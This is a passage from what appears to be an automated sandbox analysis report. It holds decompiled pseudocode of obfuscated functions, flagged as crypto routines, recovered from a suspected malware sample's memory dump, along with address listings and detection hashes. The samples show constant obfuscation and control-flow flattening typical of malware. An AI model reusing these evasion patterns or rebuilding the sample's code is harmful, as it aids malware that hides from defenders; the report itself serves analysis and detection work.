				_v44 = _v44 ^ 0x000051cc;
				_v40 = 0xa768;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00002cdd;
				_v24 = 0x8f0;
				_v24 = _v24 << 2;
				_v24 = _v24 + 0xffff08f5;
				_v24 = _v24 | 0x28f06395;
				_v24 = _v24 ^ 0xffff76ac;
				_v20 = 0x26e;
				_v20 = _v20 + 0xffffc9ca;
				_v20 = _v20 + 0x3d88;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x00008c1f;
				_v48 = E00238C8F(_t156);
				_v8 = 0xba8c;
				_v8 = _v8 + 0xffff546f;
				_v8 = _v8 | 0xb28855c5;
				_v8 = _v8 ^ 0xa47da239;
				_v8 = _v8 ^ 0x16f5fdc2;
				_v16 = 0x4025;
				_t157 = 0xb;
				_v16 = _v16 / _t157;
				_v16 = _v16 + 0xffffba03;
				_t158 = 0x3b;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x0456c691;
				_t174 = E002278A5(_t158, _t158, _v16, _t158, _v8);
				E00227787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
				 *((short*)(_t173 + _t174 * 2)) = 0;
				return 0;
			}





















                                              0x00230d3b
                                              0x00230d3e
                                              0x00230d40
                                              0x00230d43
                                              0x00230d47
                                              0x00230d48
                                              0x00230d4d
                                              0x00230d57
                                              0x00230d5d
                                              0x00230d64
                                              0x00230d6b
                                              0x00230d72
                                              0x00230d7f
                                              0x00230d82
                                              0x00230d85
                                              0x00230d8c
                                              0x00230d93
                                              0x00230da1
                                              0x00230da4
                                              0x00230dab
                                              0x00230db6
                                              0x00230db7
                                              0x00230dba
                                              0x00230dc1
                                              0x00230dc8
                                              0x00230dcf
                                              0x00230dd3
                                              0x00230dda
                                              0x00230de1
                                              0x00230de5
                                              0x00230dec
                                              0x00230df0
                                              0x00230df7
                                              0x00230e05
                                              0x00230e08
                                              0x00230e0f
                                              0x00230e1b
                                              0x00230e1e
                                              0x00230e25
                                              0x00230e2c
                                              0x00230e30
                                              0x00230e37
                                              0x00230e3e
                                              0x00230e45
                                              0x00230e4c
                                              0x00230e53
                                              0x00230e5e
                                              0x00230e61
                                              0x00230e73
                                              0x00230e78
                                              0x00230e7f
                                              0x00230e86
                                              0x00230e8d
                                              0x00230e94
                                              0x00230e9b
                                              0x00230ea7
                                              0x00230eaa
                                              0x00230eaf
                                              0x00230ebb
                                              0x00230ebe
                                              0x00230ec1
                                              0x00230ee5
                                              0x00230ef8
                                              0x00230f02
                                              0x00230f0b

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: D}0
                                              • API String ID: 0-882559769
                                              • Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                              • Instruction ID: 72bf9530bd4124a10b0561c3a69c9d8a419e38897cc61f17c38d09eef4c2f2ef
                                              • Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                              • Instruction Fuzzy Hash: E25103B2D0130AEBDF08CFA5C94A8EEBBB2FB44304F108199E111B6250D7B95B55CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0023340A, Relevance: 1.4, Strings: 1, Instructions: 118COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E0023340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t88;
				void* _t94;
				void* _t100;
				void* _t102;
				intOrPtr _t117;
				signed int _t118;
				signed int* _t121;

				_t116 = _a8;
				_t100 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t88);
				_v88 = 0x94797;
				_t117 = 0;
				_v84 = 0xfccb1;
				_t121 =  &(( &_v124)[4]);
				_v80 = 0;
				_v120 = 0xe518;
				_t102 = 0x2e39b5d1;
				_v120 = _v120 >> 0xf;
				_v120 = _v120 | 0x8d2dde7f;
				_v120 = _v120 ^ 0x46a7e325;
				_v120 = _v120 ^ 0xcb8a2201;
				_v124 = 0x16d5;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 | 0x69fc1cf8;
				_t118 = 0x78;
				_v124 = _v124 * 0x21;
				_v124 = _v124 ^ 0xa97fd862;
				_v104 = 0xc3ad;
				_v104 = _v104 * 0x54;
				_v104 = _v104 ^ 0x00400d02;
				_v112 = 0x42c5;
				_v112 = _v112 ^ 0xf5e3cf1a;
				_v112 = _v112 ^ 0xb2e8281c;
				_v112 = _v112 | 0x1ecbfa7f;
				_v112 = _v112 ^ 0x5fcbcd35;
				_v96 = 0xbfa3;
				_v96 = _v96 ^ 0x0400a118;
				_v96 = _v96 ^ 0x04005591;
				_v116 = 0x719c;
				_v116 = _v116 / _t118;
				_v116 = _v116 << 3;
				_v116 = _v116 + 0xbb41;
				_v116 = _v116 ^ 0x0000fc42;
				_v100 = 0x8c7a;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0004412d;
				_v92 = 0xd0f9;
				_v92 = _v92 + 0xffffb579;
				_v92 = _v92 ^ 0x0000a3c3;
				_v108 = 0x6440;
				_v108 = _v108 ^ 0x55818320;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0x2c19;
				_v108 = _v108 ^ 0xf3b003dd;
				do {
					while(_t102 != 0x4681a3b) {
						if(_t102 == 0xbf6d415) {
							__eflags = E0022B055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
							_t117 =  !=  ? 1 : _t117;
						} else {
							if(_t102 == 0x17b92136) {
								E002350F2( &_v76, _v120, _v124, _v104, _t100);
								_t121 =  &(_t121[3]);
								_t102 = 0x4681a3b;
								continue;
							} else {
								if(_t102 != 0x2e39b5d1) {
									goto L10;
								} else {
									_t102 = 0x17b92136;
									continue;
								}
							}
						}
						L13:
						return _t117;
					}
					_t94 = E00238F11( &_v76, _v112, _v96, _t116, _v116, _v100);
					_t121 =  &(_t121[4]);
					__eflags = _t94;
					if(__eflags == 0) {
						_t102 = 0x114ebae0;
						goto L10;
					} else {
						_t102 = 0xbf6d415;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t102 - 0x114ebae0;
				} while (__eflags != 0);
				goto L13;
			}























                                              0x00233411
                                              0x00233418
                                              0x0023341a
                                              0x0023341b
                                              0x00233422
                                              0x00233423
                                              0x00233424
                                              0x00233429
                                              0x00233431
                                              0x00233433
                                              0x0023343b
                                              0x0023343e
                                              0x00233444
                                              0x0023344c
                                              0x00233451
                                              0x00233456
                                              0x0023345e
                                              0x00233466
                                              0x0023346e
                                              0x00233476
                                              0x0023347b
                                              0x0023348a
                                              0x0023348b
                                              0x0023348f
                                              0x00233497
                                              0x002334a4
                                              0x002334a8
                                              0x002334b0
                                              0x002334b8
                                              0x002334c0
                                              0x002334c8
                                              0x002334d0
                                              0x002334d8
                                              0x002334e0
                                              0x002334e8
                                              0x002334f0
                                              0x00233503
                                              0x00233507
                                              0x0023350c
                                              0x00233514
                                              0x0023351c
                                              0x00233524
                                              0x00233529
                                              0x00233531
                                              0x00233539
                                              0x00233541
                                              0x00233549
                                              0x00233551
                                              0x00233559
                                              0x0023355e
                                              0x00233566
                                              0x0023356e
                                              0x0023356e
                                              0x00233578
                                              0x00233600
                                              0x00233602
                                              0x0023357a
                                              0x00233580
                                              0x002335a2
                                              0x002335a7
                                              0x002335aa
                                              0x00000000
                                              0x00233582
                                              0x00233588
                                              0x00000000
                                              0x0023358a
                                              0x0023358a
                                              0x00000000
                                              0x0023358a
                                              0x00233588
                                              0x00233580
                                              0x00233606
                                              0x0023360e
                                              0x0023360e
                                              0x002335c6
                                              0x002335cb
                                              0x002335ce
                                              0x002335d0
                                              0x002335d6
                                              0x00000000
                                              0x002335d2
                                              0x002335d2
                                              0x00000000
                                              0x002335d2
                                              0x00000000
                                              0x002335db
                                              0x002335db
                                              0x002335db
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: @d
                                              • API String ID: 0-4219467963
                                              • Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                              • Instruction ID: 8056466fca7a3fdc4bca1cf48a2a2b3c92d58ee8ae3d109bd9e88129b7b8fda7
                                              • Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                              • Instruction Fuzzy Hash: 1B5156B11083469BD318CF21C98A82FFBE1BBD8748F504A1DF59692160D7B5CB598F87
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00233FE7, Relevance: 1.4, Strings: 1, Instructions: 115COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00233FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t80;
				signed int _t94;
				signed int _t95;
				void* _t98;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;

				_push(_a8);
				_t114 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t80);
				_v96 = 0xd1bf;
				_t118 = _t117 + 0x10;
				_t115 = 0;
				_t98 = 0x349149b3;
				_t94 = 0x64;
				_v96 = _v96 / _t94;
				_v96 = _v96 ^ 0x00007874;
				_v104 = 0x2a01;
				_v104 = _v104 + 0x4d1a;
				_v104 = _v104 + 0xb0bd;
				_v104 = _v104 ^ 0x00017b91;
				_v108 = 0x44db;
				_v108 = _v108 + 0xffff0b38;
				_t95 = 0x1c;
				_v108 = _v108 * 7;
				_v108 = _v108 ^ 0xfffb0952;
				_v112 = 0x5707;
				_v112 = _v112 + 0x69dd;
				_v112 = _v112 + 0xef17;
				_v112 = _v112 | 0x7086095e;
				_v112 = _v112 ^ 0x7087ed58;
				_v92 = 0x8129;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x00001eae;
				_v80 = 0x8f03;
				_v80 = _v80 ^ 0x5fd75a11;
				_v80 = _v80 ^ 0x5fd7f025;
				_v84 = 0x94fc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x00001c7c;
				_v100 = 0xd584;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 / _t95;
				_v100 = _v100 ^ 0x00001ad3;
				_v88 = 0x35b5;
				_v88 = _v88 * 0x43;
				_v88 = _v88 ^ 0x000e607f;
				do {
					while(_t98 != 0x2d9dd110) {
						if(_t98 == 0x2e4dc862) {
							__eflags = E00238F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
							_t115 =  !=  ? 1 : _t115;
						} else {
							if(_t98 == 0x32f61d6a) {
								E002350F2( &_v76, _v96, _v104, _v108, _a8);
								_t118 = _t118 + 0xc;
								_t98 = 0x2d9dd110;
								continue;
							} else {
								if(_t98 != 0x349149b3) {
									goto L10;
								} else {
									_t98 = 0x32f61d6a;
									continue;
								}
							}
						}
						L13:
						return _t115;
					}
					__eflags = E0022B055(_v112, _v92, __eflags,  &_v76, _t114);
					if(__eflags == 0) {
						_t98 = 0x5080212;
						goto L10;
					} else {
						_t98 = 0x2e4dc862;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t98 - 0x5080212;
				} while (__eflags != 0);
				goto L13;
			}





















                                              0x00233fee
                                              0x00233ff5
                                              0x00233ff7
                                              0x00233ffe
                                              0x00233fff
                                              0x00234000
                                              0x00234005
                                              0x0023400d
                                              0x00234016
                                              0x00234018
                                              0x00234024
                                              0x00234029
                                              0x0023402f
                                              0x00234037
                                              0x0023403f
                                              0x00234047
                                              0x0023404f
                                              0x00234057
                                              0x0023405f
                                              0x0023406c
                                              0x0023406d
                                              0x00234071
                                              0x00234079
                                              0x00234081
                                              0x00234089
                                              0x00234091
                                              0x00234099
                                              0x002340a1
                                              0x002340a9
                                              0x002340ae
                                              0x002340b6
                                              0x002340be
                                              0x002340c6
                                              0x002340ce
                                              0x002340d6
                                              0x002340db
                                              0x002340e3
                                              0x002340eb
                                              0x002340fb
                                              0x002340ff
                                              0x00234107
                                              0x00234114
                                              0x00234118
                                              0x00234120
                                              0x00234120
                                              0x0023412a
                                              0x002341b1
                                              0x002341b3
                                              0x0023412c
                                              0x0023412e
                                              0x00234153
                                              0x00234158
                                              0x0023415b
                                              0x00000000
                                              0x00234130
                                              0x00234136
                                              0x00000000
                                              0x00234138
                                              0x00234138
                                              0x00000000
                                              0x00234138
                                              0x00234136
                                              0x0023412e
                                              0x002341b7
                                              0x002341bf
                                              0x002341bf
                                              0x00234177
                                              0x00234179
                                              0x0023417f
                                              0x00000000
                                              0x0023417b
                                              0x0023417b
                                              0x00000000
                                              0x0023417b
                                              0x00000000
                                              0x00234184
                                              0x00234184
                                              0x00234184
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: tx
                                              • API String ID: 0-1414813443
                                              • Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                              • Instruction ID: c8e648b5e7d9622aa969af5f7f2af3708eaea68391a96a9a337519b3fc7c7f0e
                                              • Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                              • Instruction Fuzzy Hash: DA41ABB15183429BE718DE20C88582FBBE1FBD8708F104A1DF5C996260D7B5DA19CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002260B9, Relevance: 1.4, Strings: 1, Instructions: 104COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E002260B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				void* _t104;
				void* _t109;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t128;

				_push(_a20);
				_t109 = __ecx;
				_t111 = _a16;
				_push(_a16);
				_push(_a12);
				_v44 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(0x104);
				_v8 = 0xaf29;
				_v8 = _v8 >> 0xe;
				_t128 = 0;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0000662d;
				_v20 = 0xac55;
				_v20 = _v20 | 0x2323cee5;
				_t124 = 0x4c;
				_v20 = _v20 / _t124;
				_v20 = _v20 ^ 0x007629b6;
				_v16 = 0xabf2;
				_v16 = _v16 | 0x220f7c85;
				_v16 = _v16 + 0xffff7509;
				_v16 = _v16 ^ 0x220f51b4;
				_v40 = 0x3232;
				_t125 = 0x1f;
				_v40 = _v40 / _t125;
				_v40 = _v40 ^ 0x00004228;
				_v36 = 0x2ec1;
				_v36 = _v36 | 0xae4e7a63;
				_v36 = _v36 ^ 0xae4e526e;
				_v12 = 0xa12f;
				_v12 = _v12 << 0xe;
				_v12 = _v12 << 0xb;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x00007580;
				_v32 = 0xadd8;
				_v32 = _v32 | 0x6e6f3325;
				_v32 = _v32 ^ 0x5adaef9e;
				_v32 = _v32 ^ 0x34b54fa4;
				_v28 = 0xb293;
				_t126 = 0x3b;
				_v28 = _v28 * 0x2d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xfb1ed4cf;
				_v24 = 0x2b1c;
				_v24 = _v24 * 6;
				_v24 = _v24 / _t126;
				_v24 = _v24 ^ 0x00001462;
				_t104 = E00227551(_a16, _v24);
				_t127 = _t104;
				if(_t104 != 0) {
					_t128 = E00227663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
					E00234F7D(_v32, _v28, _t127);
				}
				return _t128;
			}



















                                              0x002260c2
                                              0x002260c5
                                              0x002260cc
                                              0x002260cf
                                              0x002260d0
                                              0x002260d3
                                              0x002260d6
                                              0x002260d7
                                              0x002260da
                                              0x002260db
                                              0x002260dc
                                              0x002260e1
                                              0x002260ea
                                              0x002260ee
                                              0x002260f0
                                              0x002260f4
                                              0x002260f8
                                              0x002260ff
                                              0x00226106
                                              0x00226112
                                              0x00226117
                                              0x0022611c
                                              0x00226123
                                              0x0022612a
                                              0x00226131
                                              0x00226138
                                              0x0022613f
                                              0x00226149
                                              0x0022614e
                                              0x00226153
                                              0x0022615a
                                              0x00226161
                                              0x00226168
                                              0x0022616f
                                              0x00226176
                                              0x0022617a
                                              0x0022617e
                                              0x00226182
                                              0x00226189
                                              0x00226190
                                              0x00226197
                                              0x0022619e
                                              0x002261a5
                                              0x002261b0
                                              0x002261b4
                                              0x002261b7
                                              0x002261bb
                                              0x002261c2
                                              0x002261cd
                                              0x002261d5
                                              0x002261d8
                                              0x002261eb
                                              0x002261f0
                                              0x002261f7
                                              0x00226211
                                              0x00226217
                                              0x0022621c
                                              0x00226227

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: %3on
                                              • API String ID: 2962429428-3639271662
                                              • Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                              • Instruction ID: 35b915b03272bce07bbc79402d0d853c8e7ae1dabcf1b7215939dfeef1591426
                                              • Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                              • Instruction Fuzzy Hash: 0A413871E0020AABDB04DFE5D98A8EEFBB5FB44704F208159E911B7250D3B89B55CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022F536, Relevance: 1.3, Strings: 1, Instructions: 66COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 88%
                                              			E0022F536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t73;
				signed int _t84;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t73);
				_v28 = _v28 & 0x00000000;
				_v32 = 0x4854b3;
				_v8 = 0xdc0b;
				_t84 = 0x56;
				_v8 = _v8 * 0xf;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x0001e73e;
				_v12 = 0xfbc9;
				_v12 = _v12 + 0xb4de;
				_v12 = _v12 * 0x28;
				_v12 = _v12 ^ 0x0043d2f8;
				_v12 = 0x51f2;
				_v12 = _v12 + 0xffffcc79;
				_v12 = _v12 + 0xffffba87;
				_v12 = _v12 ^ 0xffffb404;
				_v12 = 0x6c9d;
				_v12 = _v12 / _t84;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0000581b;
				_v12 = 0x414e;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 | 0x4fdc2cbe;
				_v12 = _v12 ^ 0x4fdc7af3;
				_v12 = 0xe540;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x1b88e412;
				_v12 = _v12 ^ 0x1bebfc09;
				_v24 = 0x3d7;
				_v24 = _v24 + 0xffffb00b;
				_v24 = _v24 ^ 0xffff901a;
				_v20 = 0xd6b0;
				_v20 = _v20 ^ 0xee2b6cd1;
				_v20 = _v20 ^ 0xee2bf683;
				_v16 = 0x5822;
				_v16 = _v16 + 0xa5f;
				_v16 = _v16 ^ 0x00006b11;
				return E002308F3(_v12, _v24, _v20, _a8, _t84, E0022C506(_t84), _v16);
			}












                                              0x0022f53c
                                              0x0022f53f
                                              0x0022f542
                                              0x0022f543
                                              0x0022f544
                                              0x0022f549
                                              0x0022f550
                                              0x0022f559
                                              0x0022f566
                                              0x0022f567
                                              0x0022f56a
                                              0x0022f56e
                                              0x0022f575
                                              0x0022f57c
                                              0x0022f587
                                              0x0022f58a
                                              0x0022f591
                                              0x0022f598
                                              0x0022f59f
                                              0x0022f5a6
                                              0x0022f5ad
                                              0x0022f5b9
                                              0x0022f5bc
                                              0x0022f5bf
                                              0x0022f5c6
                                              0x0022f5cd
                                              0x0022f5d1
                                              0x0022f5d8
                                              0x0022f5df
                                              0x0022f5ea
                                              0x0022f5ed
                                              0x0022f5f4
                                              0x0022f5fb
                                              0x0022f602
                                              0x0022f609
                                              0x0022f610
                                              0x0022f617
                                              0x0022f61e
                                              0x0022f625
                                              0x0022f62c
                                              0x0022f633
                                              0x0022f65e

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: j^
                                              • API String ID: 0-2773993462
                                              • Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                              • Instruction ID: 5de1a9b292873cb5e0cd3814270d7cdac5b73812ed5732b42170da05f70f8adc
                                              • Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                              • Instruction Fuzzy Hash: 9B31EEB5C0070AEBDF48DFE4C98A49EBFB5FB00304F608089D511BA2A0D3B94B959F84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00235D1D, Relevance: .2, Instructions: 183COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E00235D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _t165;
				intOrPtr* _t183;
				void* _t185;
				void* _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;

				_t183 = _a24;
				_push(_t183);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t165);
				_v96 = 0x1c20a7;
				_t194 = 0;
				_v84 = _v84 & 0;
				_t199 = _t198 + 0x20;
				_v92 = 0x7c153;
				_v88 = 0xb2086;
				_t185 = 0x2476afb9;
				_v8 = 0x4175;
				_v8 = _v8 + 0xffff57ff;
				_v8 = _v8 | 0xfffbf4ff;
				_v8 = _v8 ^ 0xffffd856;
				_v56 = 0x400d;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x01004a82;
				_v52 = 0xfa4b;
				_t195 = 0x3f;
				_v52 = _v52 * 0xf;
				_v52 = _v52 ^ 0x000ed31b;
				_v48 = 0x532b;
				_v48 = _v48 | 0xa8aca4f9;
				_v48 = _v48 ^ 0xa8acfbbc;
				_v44 = 0x6cab;
				_v44 = _v44 * 0xd;
				_v44 = _v44 ^ 0x0005813c;
				_v32 = 0xa076;
				_v32 = _v32 + 0x7ba7;
				_v32 = _v32 * 0x33;
				_v32 = _v32 ^ 0x0038af53;
				_v28 = 0x80ef;
				_v28 = _v28 << 0xb;
				_v28 = _v28 | 0xbfaa7514;
				_v28 = _v28 ^ 0xbfaf1f10;
				_v24 = 0x2421;
				_v24 = _v24 / _t195;
				_t196 = 3;
				_v24 = _v24 / _t196;
				_v24 = _v24 ^ 0x000050e2;
				_v68 = 0xf6e5;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0000085c;
				_v64 = 0x7950;
				_v64 = _v64 | 0xc26498fa;
				_v64 = _v64 ^ 0xc264e84e;
				_v60 = 0xb7cc;
				_v60 = _v60 + 0xffffacef;
				_v60 = _v60 ^ 0x0000478a;
				_v40 = 0x6379;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 << 5;
				_v40 = _v40 ^ 0x00006e22;
				_v20 = 0xe665;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0xe4ef8652;
				_v20 = _v20 + 0xffffeafe;
				_v20 = _v20 ^ 0xe52339cd;
				_v80 = 0x4d1e;
				_v80 = _v80 + 0xffffc710;
				_v80 = _v80 ^ 0x000046ed;
				_v16 = 0x18c;
				_v16 = _v16 >> 4;
				_t197 = _v80;
				_v16 = _v16 * 0x41;
				_v16 = _v16 ^ 0x73128289;
				_v16 = _v16 ^ 0x7312c7aa;
				_v12 = 0xdd0b;
				_v12 = _v12 + 0xffff65de;
				_v12 = _v12 * 0x3b;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x0f6bc641;
				_v76 = 0xf5b7;
				_v76 = _v76 ^ 0xdca6f1c9;
				_v76 = _v76 ^ 0xdca64fd3;
				_v36 = 0xdf9f;
				_v36 = _v36 + 0x7ffe;
				_v36 = _v36 + 0x4fda;
				_v36 = _v36 ^ 0x00019ee0;
				_v72 = 0x5c39;
				_v72 = _v72 ^ 0x85106c7e;
				_v72 = _v72 ^ 0x85105bd4;
				do {
					while(_t185 != 0x6efb3d4) {
						if(_t185 == 0xfd0cdc7) {
							_t197 = E002396CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
							_t199 = _t199 + 0x38;
							if(_t197 == 0) {
								L15:
								return _t194;
							}
							_t185 = 0x6efb3d4;
							continue;
						}
						if(_t185 == 0x1eddc4e8) {
							E002396CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
							if(_t183 != 0) {
								 *_t183 = _t197;
							}
							goto L15;
						}
						if(_t185 != 0x2476afb9) {
							goto L11;
						}
						_t185 = 0xfd0cdc7;
					}
					_push(_t185);
					_push(_t185);
					_t194 = E00228736(_t197);
					if(_t194 == 0) {
						_t185 = 0x710c028;
						goto L11;
					}
					_t185 = 0x1eddc4e8;
					continue;
					L11:
				} while (_t185 != 0x710c028);
				goto L15;
			}



































                                              0x00235d24
                                              0x00235d29
                                              0x00235d2a
                                              0x00235d2d
                                              0x00235d30
                                              0x00235d33
                                              0x00235d36
                                              0x00235d3a
                                              0x00235d3b
                                              0x00235d40
                                              0x00235d47
                                              0x00235d49
                                              0x00235d4c
                                              0x00235d4f
                                              0x00235d58
                                              0x00235d5f
                                              0x00235d64
                                              0x00235d6b
                                              0x00235d72
                                              0x00235d79
                                              0x00235d80
                                              0x00235d87
                                              0x00235d8b
                                              0x00235d92
                                              0x00235d9f
                                              0x00235da2
                                              0x00235da5
                                              0x00235dac
                                              0x00235db3
                                              0x00235dba
                                              0x00235dc1
                                              0x00235dcc
                                              0x00235dcf
                                              0x00235dd6
                                              0x00235ddd
                                              0x00235de8
                                              0x00235deb
                                              0x00235df2
                                              0x00235df9
                                              0x00235dfd
                                              0x00235e04
                                              0x00235e0b
                                              0x00235e19
                                              0x00235e1f
                                              0x00235e22
                                              0x00235e25
                                              0x00235e2c
                                              0x00235e33
                                              0x00235e37
                                              0x00235e3e
                                              0x00235e45
                                              0x00235e4c
                                              0x00235e53
                                              0x00235e5a
                                              0x00235e61
                                              0x00235e68
                                              0x00235e6f
                                              0x00235e73
                                              0x00235e77
                                              0x00235e7e
                                              0x00235e85
                                              0x00235e89
                                              0x00235e90
                                              0x00235e97
                                              0x00235e9e
                                              0x00235ea5
                                              0x00235eac
                                              0x00235eb3
                                              0x00235eba
                                              0x00235ec2
                                              0x00235ec5
                                              0x00235ec8
                                              0x00235ecf
                                              0x00235ed6
                                              0x00235edd
                                              0x00235ee8
                                              0x00235eeb
                                              0x00235eef
                                              0x00235ef6
                                              0x00235efd
                                              0x00235f04
                                              0x00235f0b
                                              0x00235f12
                                              0x00235f19
                                              0x00235f20
                                              0x00235f27
                                              0x00235f2e
                                              0x00235f35
                                              0x00235f3c
                                              0x00235f3c
                                              0x00235f4a
